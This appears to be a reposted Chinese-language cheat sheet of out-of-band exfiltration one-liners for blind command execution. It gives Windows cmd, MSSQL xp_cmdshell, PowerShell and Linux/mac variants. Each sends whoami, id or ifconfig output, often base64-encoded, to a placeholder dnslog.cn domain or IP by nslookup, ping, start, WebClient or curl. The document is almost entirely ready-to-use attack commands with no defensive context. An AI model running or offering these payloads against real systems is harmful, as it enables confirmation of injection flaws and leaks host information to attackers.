1. windows 命令行:
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.dnslog.cn && nslookup !FINAL!"2. mssql:
exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.dnslog.cn %26%26 ping !FINAL!""";exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";3. windows 通过start外带
for /F %X in ('whoami') do start http://xx.xx.xx.xx:80/%Xfor /F "delims= tokens=2" %i in ('whoami') do ping -n 1 %i.xx.dnslog.cn4. windows powershell
for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xx.xx.xx.xx/'+$a);5. linux/mac 通过ping
ping -c 1 $(whoami).xxx.dnslog.cn6. linux/mac 通过ping+base64
ping -c 1 $(whoami|base64).xxx.dnslog.cn7. linux/mac 通过curl
curl http://xx.xx.xx.xx/$(whoami)curl http://$(whoami).xx.dnslog.cn8. linux/mac 通过curl+base64
curl http://xx.xx.xx.xx/$(id|base64)curl http://$(id|base64).xx.dnslog.cncurl http://xx.xx.xx.xx/$(ifconfig|base64|tr 'n' '-')
文章来源: http://mp.weixin.qq.com/s?__biz=MzA4NzUzNzgyMw==&mid=2247485438&idx=1&sn=5bfe4875a5f24da836de762e3dcc49e8&chksm=9036a60ea7412f18e351c1ea7ab4feff24db7dffffe80937d75e19d2165fd09560ee5d51ae99#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh